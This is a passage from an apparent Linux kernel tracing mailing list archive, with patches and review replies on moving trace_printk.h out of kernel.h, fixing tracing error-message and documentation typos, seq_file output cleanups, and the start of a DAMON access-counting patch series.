TRACE_GTT is enabled, and in the next header it is needed if TRACE_GEM is
enabled. To me it sounds like the whole driver simply needs trace_printk.h.

>  #define GTT_TRACE(...) trace_printk(__VA_ARGS__)
>  #else
>  #define GTT_TRACE(...)
> diff --git a/drivers/gpu/drm/i915/i915_gem.h b/drivers/gpu/drm/i915/i915_gem.h
> index 1da8fb61c09e..f490052e8964 100644
> --- a/drivers/gpu/drm/i915/i915_gem.h
> +++ b/drivers/gpu/drm/i915/i915_gem.h
> @@ -117,6 +117,7 @@ int i915_gem_open(struct drm_i915_private *i915, struct drm_file *file);
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GEM)
>  #include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #define GEM_TRACE(...) trace_printk(__VA_ARGS__)
>  #define GEM_TRACE_ERR(...) do {						\
>  	pr_err(__VA_ARGS__);						\
> diff --git a/drivers/hwtracing/stm/dummy_stm.c b/drivers/hwtracing/stm/dummy_stm.c
> index 38528ffdc0b3..784f9af7ccba 100644
> --- a/drivers/hwtracing/stm/dummy_stm.c
> +++ b/drivers/hwtracing/stm/dummy_stm.c
> @@ -14,6 +14,10 @@
>  #include <linux/stm.h>
>  #include <uapi/linux/stm.h>
>  
> +#ifdef DEBUG
> +#include <linux/trace_printk.h>
> +#endif
> +

Same here. The cost of adding the header in a particular C file is
unmeasurable. But playing "#undef DEBUG #ifdef DEBUG" games looks
weird.

Imagine a developer who has DEBUG enabled adds another debugging
trace_printk() outside the DEBUG block. The patch compiles fine for them,
but a user with DEBUG disabled gets a broken build, and now we hit the
same problem as in the config-based case.

To put it simply: dummy_stm just needs trace_printk.h.
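The point can be illustrated with a userspace analogue (hypothetical names; <stdio.h> stands in for <linux/trace_printk.h>). With the header included unconditionally, the disabled variant can keep the call visible to the compiler behind if (0), similar in spirit to the kernel's no_printk(), so format strings are still checked and every call site builds in both configurations:

```c
#include <assert.h>
#include <stdio.h>	/* stands in for <linux/trace_printk.h>; always included */

/*
 * Hypothetical debug macro. With DEBUG it prints; without DEBUG the call is
 * dead code behind if (0), but printf() is still declared, so the format
 * string is type-checked and the file builds either way.
 */
#ifdef DEBUG
#define dbg_trace(...)	printf(__VA_ARGS__)
#else
#define dbg_trace(...)	do { if (0) printf(__VA_ARGS__); } while (0)
#endif

/* Hypothetical caller, loosely modelled on a packet handler. */
int model_packet(unsigned int size)
{
	dbg_trace("packet: %u bytes\n", size);
	return (int)size;
}
```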

>  static ssize_t notrace
>  dummy_stm_packet(struct stm_data *stm_data, unsigned int master,
>  		 unsigned int channel, unsigned int packet, unsigned int flags,
> diff --git a/drivers/infiniband/hw/hfi1/trace_dbg.h b/drivers/infiniband/hw/hfi1/trace_dbg.h
> index 58304b91380f..30df5e246586 100644
> --- a/drivers/infiniband/hw/hfi1/trace_dbg.h
> +++ b/drivers/infiniband/hw/hfi1/trace_dbg.h
> @@ -103,6 +103,7 @@ __hfi1_trace_def(IOCTL);
>   */
>  
>  #ifdef HFI1_EARLY_DBG
> +#include <linux/trace_printk.h>
>  #define hfi1_dbg_early(fmt, ...) \
>  	trace_printk(fmt, ##__VA_ARGS__)
>  #else
> diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
> index 41118bba9197..955c73bd601f 100644
> --- a/drivers/usb/early/xhci-dbc.c
> +++ b/drivers/usb/early/xhci-dbc.c
> @@ -30,6 +30,7 @@ static struct xdbc_state xdbc;
>  static bool early_console_keep;
>  
>  #ifdef XDBC_TRACE
> +#include <linux/trace_printk.h>
>  #define	xdbc_trace	trace_printk
>  #else
>  static inline void xdbc_trace(const char *fmt, ...) { }
> diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
> index 8045e4ff270c..0eff4a0c6a6c 100644
> --- a/fs/ext4/inline.c
> +++ b/fs/ext4/inline.c
> @@ -934,6 +934,7 @@ static int ext4_da_convert_inline_data_to_extent(struct address_space *mapping,
>  }
>  
>  #ifdef INLINE_DIR_DEBUG
> +#include <linux/trace_printk.h>
>  void ext4_show_inline_dir(struct inode *dir, struct buffer_head *bh,
>  			  void *inline_start, int inline_size)
>  {
> diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
> index 02bc5027523a..b5336a81e619 100644
> --- a/include/linux/ftrace.h
> +++ b/include/linux/ftrace.h
> @@ -8,6 +8,8 @@
>  #define _LINUX_FTRACE_H
>  
>  #include <linux/trace_recursion.h>
> +#include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #include <linux/trace_clock.h>
>  #include <linux/jump_label.h>
>  #include <linux/kallsyms.h>
> diff --git a/include/linux/kernel.h b/include/linux/kernel.h
> index e5570a16cbb1..e87a40fbd152 100644
> --- a/include/linux/kernel.h
> +++ b/include/linux/kernel.h
> @@ -31,7 +31,6 @@
>  #include <linux/build_bug.h>
>  #include <linux/sprintf.h>
>  #include <linux/static_call_types.h>
> -#include <linux/trace_printk.h>
>  #include <linux/util_macros.h>
>  #include <linux/wordpart.h>
>  
> diff --git a/include/linux/sunrpc/debug.h b/include/linux/sunrpc/debug.h
> index ab61bed2f7af..7524f5d82fba 100644
> --- a/include/linux/sunrpc/debug.h
> +++ b/include/linux/sunrpc/debug.h
> @@ -29,6 +29,7 @@ extern unsigned int		nlm_debug;
>  # define ifdebug(fac)		if (unlikely(rpc_debug & RPCDBG_##fac))
>  
>  # if IS_ENABLED(CONFIG_SUNRPC_DEBUG_TRACE)
> +#  include <linux/trace_printk.h>
>  #  define __sunrpc_printk(fmt, ...)	trace_printk(fmt, ##__VA_ARGS__)
>  # else
>  #  define __sunrpc_printk(fmt, ...)	printk(KERN_DEFAULT fmt, ##__VA_ARGS__)
> diff --git a/include/linux/trace_printk.h b/include/linux/trace_printk.h
> index a488ea9e9f85..74ce4f8995c4 100644
> --- a/include/linux/trace_printk.h
> +++ b/include/linux/trace_printk.h
> @@ -1,11 +1,12 @@
>  /* SPDX-License-Identifier: GPL-2.0 */
>  #ifndef _LINUX_TRACE_PRINTK_H
>  #define _LINUX_TRACE_PRINTK_H
> +#if !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO)
>  
> -#include <linux/compiler_attributes.h>
>  #include <linux/instruction_pointer.h>
>  #include <linux/stddef.h>
>  #include <linux/stringify.h>
> +#include <linux/stdarg.h>
>  
>  #ifdef CONFIG_TRACING
>  static inline __printf(1, 2)
> @@ -147,5 +148,5 @@ ftrace_vprintk(const char *fmt, va_list ap)
>  	return 0;
>  }
>  #endif /* CONFIG_TRACING */
> -
> +#endif /* !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO) */
>  #endif
> diff --git a/kernel/trace/ring_buffer_benchmark.c b/kernel/trace/ring_buffer_benchmark.c
> index 593e3b59e42e..2bb25caebb75 100644
> --- a/kernel/trace/ring_buffer_benchmark.c
> +++ b/kernel/trace/ring_buffer_benchmark.c
> @@ -5,6 +5,7 @@
>   * Copyright (C) 2009 Steven Rostedt <srostedt@redhat.com>
>   */
>  #include <linux/ring_buffer.h>
> +#include <linux/trace_printk.h>
>  #include <linux/completion.h>
>  #include <linux/kthread.h>
>  #include <uapi/linux/sched/types.h>
> diff --git a/samples/fprobe/fprobe_example.c b/samples/fprobe/fprobe_example.c
> index bfe98ce826f3..de81b9b4ca7d 100644
> --- a/samples/fprobe/fprobe_example.c
> +++ b/samples/fprobe/fprobe_example.c
> @@ -12,6 +12,7 @@
>  
>  #define pr_fmt(fmt) "%s: " fmt, __func__
>  
> +#include <linux/trace_printk.h>
>  #include <linux/kernel.h>
>  #include <linux/module.h>
>  #include <linux/fprobe.h>
> diff --git a/samples/ftrace/ftrace-direct-too.c b/samples/ftrace/ftrace-direct-too.c
> index bf2411aa6fd7..159190f4103f 100644
> --- a/samples/ftrace/ftrace-direct-too.c
> +++ b/samples/ftrace/ftrace-direct-too.c
> @@ -1,6 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
>  #include <linux/module.h>
> -
>  #include <linux/mm.h> /* for handle_mm_fault() */
>  #include <linux/ftrace.h>
>  #if !defined(CONFIG_ARM64) && !defined(CONFIG_PPC32)
> diff --git a/samples/trace_printk/trace-printk.c b/samples/trace_printk/trace-printk.c
> index cfc159580263..ff37aeb8523e 100644
> --- a/samples/trace_printk/trace-printk.c
> +++ b/samples/trace_printk/trace-printk.c
> @@ -1,4 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
> +#include <linux/trace_printk.h>
>  #include <linux/module.h>
>  #include <linux/kthread.h>
>  #include <linux/irq_work.h>
> -- 
> 2.53.0
> 

^ permalink raw reply

* [PATCH] tracing/probes: make file offset error message probe-agnostic
From: Yudistira Putra @ 2026-06-22 16:00 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

The shared probe argument parser rejects file offsets for kernel probes.
This path is used outside the kprobe event parser too, but the diagnostic
currently says "with kprobe" even when emitted from another probe path.

Make the diagnostic probe-agnostic.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.c | 2 +-
 kernel/trace/trace_probe.h | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index fd1caa1f9723..fec0ad51cf61 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1228,7 +1228,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 			code->op = FETCH_OP_IMM;
 			code->immediate = param;
 		} else if (arg[1] == '+') {
-			/* kprobes don't support file offsets */
+			/* Kernel probes do not support file offsets */
 			if (ctx->flags & TPARG_FL_KERNEL) {
 				trace_probe_log_err(ctx->offset, FILE_ON_KPROBE);
 				return -EINVAL;
diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..6162f066c2b8 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -516,7 +516,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
 	C(IMMSTR_NO_CLOSE,	"String is not closed with '\"'"),	\
-	C(FILE_ON_KPROBE,	"File offset is not available with kprobe"), \
+	C(FILE_ON_KPROBE,	"File offset is not available for kernel probes"), \
 	C(BAD_FILE_OFFS,	"Invalid file offset value"),		\
 	C(SYM_ON_UPROBE,	"Symbol is not available with uprobe"),	\
 	C(TOO_MANY_OPS,		"Dereference is too much nested"), 	\
-- 
2.43.0
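
The error strings edited here live in a single C(name, text) list that is expanded more than once (an X-macro). A minimal self-contained reduction of that pattern, with hypothetical MODEL_* names and message strings taken from these patches, shows why changing a message is a one-line diff:

```c
#include <assert.h>
#include <string.h>

/* One list of (name, message) pairs, expanded twice below. */
#define MODEL_ERRORS							\
	C(BAD_VAR,		"Invalid $-variable specified"),	\
	C(FILE_ON_KPROBE,	"File offset is not available for kernel probes"), \
	C(SYM_ON_UPROBE,	"Symbol is not available with uprobe"),

/* First expansion: the enum of error codes. */
#undef C
#define C(a, b)	MODEL_ERR_##a
enum model_err { MODEL_ERRORS MODEL_ERR_COUNT };

/* Second expansion: the message table, indexed by the same enum. */
#undef C
#define C(a, b)	b
const char *const model_err_text[] = { MODEL_ERRORS };
```

Because only the text half of an entry changes, the FILE_ON_KPROBE identifier and its users stay as they are, and the enum and the table cannot drift apart.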


^ permalink raw reply related

* [PATCH] tracing/probes: fix typo in invalid variable error message
From: Yudistira Putra @ 2026-06-22 15:23 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

Fix a typo in the BAD_VAR diagnostic emitted for invalid $-variables
in probe event arguments.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..0f09f7aaf93f 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -511,7 +511,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(NO_RETVAL,		"This function returns 'void' type"),	\
 	C(BAD_STACK_NUM,	"Invalid stack number"),		\
 	C(BAD_ARG_NUM,		"Invalid argument number"),		\
-	C(BAD_VAR,		"Invalid $-valiable specified"),	\
+	C(BAD_VAR,		"Invalid $-variable specified"),	\
 	C(BAD_REG_NAME,		"Invalid register name"),		\
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH v2 0/2] tracing: Remove trace_printk.h from kernel.h
From: Steven Rostedt @ 2026-06-22 15:21 UTC (permalink / raw)
  To: Masami Hiramatsu (Google)
  Cc: linux-kernel, linux-trace-kernel, Mark Rutland, Mathieu Desnoyers,
	Andrew Morton, Linus Torvalds, Sebastian Andrzej Siewior,
	John Ogness, Thomas Gleixner, Peter Zijlstra, Julia Lawall,
	Yury Norov
In-Reply-To: <20260622234416.9f85ff87b81bcfb9776c73a6@kernel.org>

On Mon, 22 Jun 2026 23:44:16 +0900
Masami Hiramatsu (Google) <mhiramat@kernel.org> wrote:

> The series looks good to me.
> 
> Acked-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Thanks!

-- Steve

^ permalink raw reply

* Re: [PATCH v2 1/2] tracing: Move non-trace_printk prototypes into trace_controls.h
From: Steven Rostedt @ 2026-06-22 15:21 UTC (permalink / raw)
  To: Yury Norov
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall
In-Reply-To: <ajk7fN5v31kCfGVp@yury>

On Mon, 22 Jun 2026 09:41:16 -0400
Yury Norov <yury.norov@gmail.com> wrote:

> On Mon, Jun 22, 2026 at 09:07:40AM -0400, Steven Rostedt wrote:
> > From: Steven Rostedt <rostedt@goodmis.org>
> > 
> > In order to remove the include to trace_printk.h from kernel.h the tracing
> > control prototypes need to be separated into their own header file as they
> > are used in other common header files like rcu.h. There's no point in
> > removing trace_printk.h from kernel.h if it just gets added back to other
> > common headers.
> > 
> > Prototypes are very cheap for the compiler and should not be an issue.
> > 
> > Signed-off-by: Steven Rostedt <rostedt@goodmis.org>  
> 
> Suggested-by: Yury Norov <yury.norov@gmail.com>

Thanks, I'll add your tag.

-- Steve

^ permalink raw reply

* [PATCH v2 2/2] tracing/user_events: Replace a seq_printf() call by seq_puts() in user_seq_show()
From: Markus Elfring @ 2026-06-22 15:11 UTC (permalink / raw)
  To: linux-trace-kernel, Masami Hiramatsu, Mathieu Desnoyers,
	Steven Rostedt
  Cc: LKML, kernel-janitors
In-Reply-To: <6a37c46d-588d-406f-88fa-2f8562709e5f@web.de>

From: Markus Elfring <elfring@users.sourceforge.net>
Date: Mon, 22 Jun 2026 16:42:07 +0200

A single string is printed within a loop by seq_printf() with a "%s"
format. Thus use the corresponding function “seq_puts” for this call.

The source code was transformed by using the Coccinelle software.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
---
 kernel/trace/trace_events_user.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
index a79b7c07dabb..ba9cc168280d 100644
--- a/kernel/trace/trace_events_user.c
+++ b/kernel/trace/trace_events_user.c
@@ -2781,7 +2781,7 @@ static int user_seq_show(struct seq_file *m, void *p)
 	hash_for_each(group->register_table, i, user, node) {
 		status = user->status;
 
-		seq_printf(m, "%s", EVENT_TP_NAME(user));
+		seq_puts(m, EVENT_TP_NAME(user));
 
 		if (status != 0) {
 			seq_puts(m, " # Used by");
-- 
2.54.0


^ permalink raw reply related

* [PATCH v2 1/2] tracing/user_events: Use seq_putc() in two functions
From: Markus Elfring @ 2026-06-22 15:10 UTC (permalink / raw)
  To: linux-trace-kernel, Masami Hiramatsu, Mathieu Desnoyers,
	Steven Rostedt
  Cc: LKML, kernel-janitors
In-Reply-To: <6a37c46d-588d-406f-88fa-2f8562709e5f@web.de>

From: Markus Elfring <elfring@users.sourceforge.net>
Date: Mon, 22 Jun 2026 16:37:18 +0200

Single characters are put into a sequence by seq_puts(). Thus use the
corresponding function “seq_putc” for these calls instead.

The source code was transformed by using the Coccinelle software.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
---
 kernel/trace/trace_events_user.c | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
index c4ba484f7b38..a79b7c07dabb 100644
--- a/kernel/trace/trace_events_user.c
+++ b/kernel/trace/trace_events_user.c
@@ -1813,7 +1813,7 @@ static int user_event_show(struct seq_file *m, struct dyn_event *ev)
 
 	list_for_each_entry_reverse(field, head, link) {
 		if (depth == 0)
-			seq_puts(m, " ");
+			seq_putc(m, ' ');
 		else
 			seq_puts(m, "; ");
 
@@ -1825,7 +1825,7 @@ static int user_event_show(struct seq_file *m, struct dyn_event *ev)
 		depth++;
 	}
 
-	seq_puts(m, "\n");
+	seq_putc(m, '\n');
 
 	return 0;
 }
@@ -2794,13 +2794,13 @@ static int user_seq_show(struct seq_file *m, void *p)
 			busy++;
 		}
 
-		seq_puts(m, "\n");
+		seq_putc(m, '\n');
 		active++;
 	}
 
 	mutex_unlock(&group->reg_mutex);
 
-	seq_puts(m, "\n");
+	seq_putc(m, '\n');
 	seq_printf(m, "Active: %d\n", active);
 	seq_printf(m, "Busy: %d\n", busy);
 
-- 
2.54.0


^ permalink raw reply related

* [PATCH v2 0/2] tracing/user_events: More efficient data output in two functions
From: Markus Elfring @ 2026-06-22 15:07 UTC (permalink / raw)
  To: linux-trace-kernel, Masami Hiramatsu, Mathieu Desnoyers,
	Steven Rostedt
  Cc: LKML, kernel-janitors
In-Reply-To: <20260611085949.59017a55@gandalf.local.home>

From: Markus Elfring <elfring@users.sourceforge.net>
Date: Mon, 22 Jun 2026 16:58:32 +0200

Two changes suggested by static source code analysis were applied.

Markus Elfring (2):
  Use seq_putc() in two functions
  Replace a seq_printf() call by seq_puts() in user_seq_show()


v2:
Steven Rostedt asked for seq_putc() to be used in more places.


 kernel/trace/trace_events_user.c | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

-- 
2.54.0
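
As a userspace analogue of this series (stdio instead of seq_file; hypothetical names), the old and new call styles emit identical bytes. The fputs()/fputc() forms just avoid the formatting work, much as seq_puts()/seq_putc() avoid the vsnprintf() path that seq_printf() takes:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Render one line the "old" way (printf-style "%s", one-char strings) or
 * the "new" way (fputs()/fputc()). Returns a malloc'd buffer or NULL.
 */
char *model_render(const char *name, int old_style)
{
	char *buf = NULL;
	size_t len = 0;
	FILE *f = open_memstream(&buf, &len);

	if (!f)
		return NULL;
	if (old_style) {
		fprintf(f, "%s", name);	/* like seq_printf(m, "%s", ...) */
		fputs(" ", f);		/* like seq_puts(m, " ") */
		fputs("\n", f);		/* like seq_puts(m, "\n") */
	} else {
		fputs(name, f);		/* like seq_puts(m, ...) */
		fputc(' ', f);		/* like seq_putc(m, ' ') */
		fputc('\n', f);		/* like seq_putc(m, '\n') */
	}
	if (fclose(f) != 0) {
		free(buf);
		return NULL;
	}
	return buf;
}
```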


^ permalink raw reply

* Re: [PATCH v2 0/2] tracing: Remove trace_printk.h from kernel.h
From: Masami Hiramatsu @ 2026-06-22 14:44 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall, Yury Norov
In-Reply-To: <20260622130739.375198646@kernel.org>

On Mon, 22 Jun 2026 09:07:39 -0400
Steven Rostedt <rostedt@kernel.org> wrote:

> 
> Remove trace_printk.h from kernel.h by creating a trace_controls.h for the
> places that need access to tracing prototypes like tracing_off(), and by
> having the places that need trace_printk() include trace_printk.h directly.
> 
> Changes since v1: https://lore.kernel.org/all/20260621093430.264983361@kernel.org/
> 
> - Create a trace_controls.h header to move the prototypes into and not
>   include it back into kernel.h
> 
> - Just remove trace_printk.h from kernel.h with no alternative to keep the
>   previous behavior.
> 
> Steven Rostedt (2):
>       tracing: Move non-trace_printk prototypes into trace_controls.h
>       tracing: Remove trace_printk.h from kernel.h
> 

The series looks good to me.

Acked-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>

for this series.

Thanks,

> ----
>  arch/powerpc/kvm/book3s_xics.c         |  1 +
>  arch/powerpc/xmon/xmon.c               |  1 +
>  arch/s390/kernel/ipl.c                 |  1 +
>  arch/s390/kernel/machine_kexec.c       |  1 +
>  drivers/gpu/drm/i915/gt/intel_gtt.h    |  1 +
>  drivers/gpu/drm/i915/i915_gem.h        |  2 ++
>  drivers/hwtracing/stm/dummy_stm.c      |  4 +++
>  drivers/infiniband/hw/hfi1/trace_dbg.h |  1 +
>  drivers/tty/sysrq.c                    |  1 +
>  drivers/usb/early/xhci-dbc.c           |  1 +
>  fs/ext4/inline.c                       |  1 +
>  include/linux/ftrace.h                 |  2 ++
>  include/linux/kernel.h                 |  1 -
>  include/linux/sunrpc/debug.h           |  1 +
>  include/linux/trace_controls.h         | 54 ++++++++++++++++++++++++++++++++
>  include/linux/trace_printk.h           | 56 ++--------------------------------
>  kernel/debug/debug_core.c              |  1 +
>  kernel/panic.c                         |  1 +
>  kernel/rcu/rcu.h                       |  2 ++
>  kernel/rcu/rcutorture.c                |  1 +
>  kernel/trace/ring_buffer_benchmark.c   |  1 +
>  kernel/trace/trace.h                   |  1 +
>  kernel/trace/trace_benchmark.c         |  1 +
>  lib/sys_info.c                         |  1 +
>  samples/fprobe/fprobe_example.c        |  1 +
>  samples/ftrace/ftrace-direct-too.c     |  1 -
>  samples/trace_printk/trace-printk.c    |  1 +
>  27 files changed, 86 insertions(+), 55 deletions(-)
>  create mode 100644 include/linux/trace_controls.h


-- 
Masami Hiramatsu (Google) <mhiramat@kernel.org>


* [PATCH] Documentation: tracing: fix typo in events documentation
From: Yudistira Putra @ 2026-06-22 14:37 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	linux-trace-kernel, linux-doc, linux-kernel, Yudistira Putra

Fix a typo in the tracing events documentation: "can by built up"
should be "can be built up".

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 Documentation/trace/events.rst | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Documentation/trace/events.rst b/Documentation/trace/events.rst
index 18d112963dec..581f2260614b 100644
--- a/Documentation/trace/events.rst
+++ b/Documentation/trace/events.rst
@@ -1064,7 +1064,7 @@ correct command type, and a pointer to an event-specific run_command()
 callback that will be called to actually execute the event-specific
 command function.
 
-Once that's done, the command string can by built up by successive
+Once that's done, the command string can be built up by successive
 calls to argument-adding functions.
 
 To add a single argument, define and initialize a struct dynevent_arg
-- 
2.43.0



* [RFC PATCH v1.3 06/18] mm/damon/core: use damon_nr_accesses_mvsum() for damos region tracing
From: SeongJae Park @ 2026-06-22 14:21 UTC (permalink / raw)
  Cc: SeongJae Park, Andrew Morton, Masami Hiramatsu, Mathieu Desnoyers,
	Steven Rostedt, damon, linux-kernel, linux-mm, linux-trace-kernel
In-Reply-To: <20260622142139.30269-1-sj@kernel.org>

damon_nr_accesses_mvsum() returns a value equivalent to nr_accesses_bp.
The function is also simpler, and therefore less prone to errors.
Calling the function is more expensive than simply reading the field,
but because the function is quite simple, the overhead should be
negligible.  Use it instead of nr_accesses_bp in the damos_before_apply
tracepoint, which exports DAMON regions.

Signed-off-by: SeongJae Park <sj@kernel.org>
---
 include/trace/events/damon.h | 8 +++++---
 mm/damon/core.c              | 5 +++--
 2 files changed, 8 insertions(+), 5 deletions(-)

diff --git a/include/trace/events/damon.h b/include/trace/events/damon.h
index 78388538acf44..8851727ae1627 100644
--- a/include/trace/events/damon.h
+++ b/include/trace/events/damon.h
@@ -78,9 +78,11 @@ TRACE_EVENT_CONDITION(damos_before_apply,
 
 	TP_PROTO(unsigned int context_idx, unsigned int scheme_idx,
 		unsigned int target_idx, struct damon_region *r,
-		unsigned int nr_regions, bool do_trace),
+		unsigned int nr_accesses, unsigned int nr_regions,
+		bool do_trace),
 
-	TP_ARGS(context_idx, scheme_idx, target_idx, r, nr_regions, do_trace),
+	TP_ARGS(context_idx, scheme_idx, target_idx, r, nr_accesses,
+		nr_regions, do_trace),
 
 	TP_CONDITION(do_trace),
 
@@ -101,7 +103,7 @@ TRACE_EVENT_CONDITION(damos_before_apply,
 		__entry->target_idx = target_idx;
 		__entry->start = r->ar.start;
 		__entry->end = r->ar.end;
-		__entry->nr_accesses = r->nr_accesses_bp / 10000;
+		__entry->nr_accesses = nr_accesses;
 		__entry->age = r->age;
 		__entry->nr_regions = nr_regions;
 	),
diff --git a/mm/damon/core.c b/mm/damon/core.c
index d6cc538172b40..ca68c4835c391 100644
--- a/mm/damon/core.c
+++ b/mm/damon/core.c
@@ -2442,7 +2442,7 @@ static void damos_apply_scheme(struct damon_ctx *c, struct damon_target *t,
 	struct damos *siter;		/* schemes iterator */
 	unsigned int sidx = 0;
 	struct damon_target *titer;	/* targets iterator */
-	unsigned int tidx = 0;
+	unsigned int tidx = 0, nr_accesses = 0;
 	bool do_trace = false;
 
 	/* get indices for trace_damos_before_apply() */
@@ -2457,6 +2457,7 @@ static void damos_apply_scheme(struct damon_ctx *c, struct damon_target *t,
 				break;
 			tidx++;
 		}
+		nr_accesses = damon_nr_accesses_mvsum(r, c);
 		do_trace = true;
 	}
 
@@ -2472,7 +2473,7 @@ static void damos_apply_scheme(struct damon_ctx *c, struct damon_target *t,
 		if (damos_core_filter_out(c, t, r, s))
 			return;
 		ktime_get_coarse_ts64(&begin);
-		trace_damos_before_apply(cidx, sidx, tidx, r,
+		trace_damos_before_apply(cidx, sidx, tidx, r, nr_accesses,
 				damon_nr_regions(t), do_trace);
 		sz_applied = c->ops.apply_scheme(c, t, r, s,
 				&sz_ops_filter_passed);
-- 
2.47.3


* [RFC PATCH v1.3 00/18] mm/damon: optimize out nr_accesses_bp
From: SeongJae Park @ 2026-06-22 14:21 UTC (permalink / raw)
  Cc: SeongJae Park, Andrew Morton, Brendan Higgins, David Gow,
	Masami Hiramatsu, Mathieu Desnoyers, Shuah Khan, Steven Rostedt,
	damon, kunit-dev, linux-kernel, linux-kselftest, linux-mm,
	linux-trace-kernel

TLDR: Replace damon_region->nr_accesses_bp, which is easy to get wrong,
with a simpler on-demand moving sum function, damon_nr_accesses_mvsum().

Background
==========

DAMON's monitoring output (the access pattern snapshot, or more
technically, damon_region->nr_accesses) is completed once per aggregation
interval, which is 100 ms by default.  Users can increase the interval
arbitrarily as needed.  Under the suggested intervals auto-tuning setup,
it can span up to 200 seconds.  If the aggregation interval is too long,
snapshot users cannot get the snapshot in a reasonable time.  To mitigate
this, we introduced a new damon_region field, nr_accesses_bp.  It holds
a pseudo moving sum of nr_accesses in basis point (bp) units and is
updated every sampling interval.
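To make the per-sampling-interval update concrete, here is a minimal
user-space sketch in C.  It is not the DAMON code: BP, mvsum_update() and
mvsum_after() are hypothetical names, and the sketch assumes the moving
sum equals the previous aggregation window's access count at the start of
each window.  Each sample subtracts an average share of the previous
window's total and adds the new sample, so every update has to be applied
exactly once for the value to stay correct.

```c
#include <stdbool.h>

#define BP 10000u /* hypothetical: one access expressed in basis points */

/*
 * Hypothetical per-sample update of a pseudo moving sum kept in bp units:
 * drop an average share of the previous window's total, then add the new
 * sample.  Every update has to be applied exactly once to stay correct.
 */
static unsigned int mvsum_update(unsigned int mvsum_bp,
				 unsigned int last_total, /* previous window's accesses */
				 unsigned int len_window, /* samples per window */
				 bool accessed)
{
	return mvsum_bp - last_total * BP / len_window + (accessed ? BP : 0);
}

/*
 * Apply nr_samples updates, assuming the sum equals the previous window's
 * total at the start of the current window.
 */
static unsigned int mvsum_after(unsigned int last_total,
				unsigned int len_window,
				const bool *samples, unsigned int nr_samples)
{
	unsigned int mvsum_bp = last_total * BP;

	for (unsigned int i = 0; i < nr_samples; i++)
		mvsum_bp = mvsum_update(mvsum_bp, last_total, len_window,
					samples[i]);
	return mvsum_bp;
}
```

For example, assuming a 5 ms sampling interval with the 100 ms default
aggregation interval (20 samples per window), a previous-window count of
10, and ten samples of which every other one saw an access, mvsum_after()
returns 100000 bp, i.e. 10 accesses: half of the old window's weight plus
the 5 new accesses.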

It turned out that keeping it correctly updated every sampling interval
is not that easy.  While developing the online parameter update feature
and other experimental hacks, we found that it is easily corrupted,
because every per-sampling-interval update has to be correct.  Once it is
corrupted, DAMON's monitoring outputs become badly wrong.  Hence we added
a few validation checks.

Solution
========

There is no real reason to keep it updated every sampling interval.
Thanks to the simple pseudo moving sum mechanism and an existing helper
field (last_nr_accesses), the pseudo moving sum can instead be calculated
on demand, in a much simpler way.

Implement a function that computes the pseudo moving sum on demand, and
replace the uses of nr_accesses_bp with the new function.  Also remove the
tests for nr_accesses_bp and the per-sampling-interval update functions,
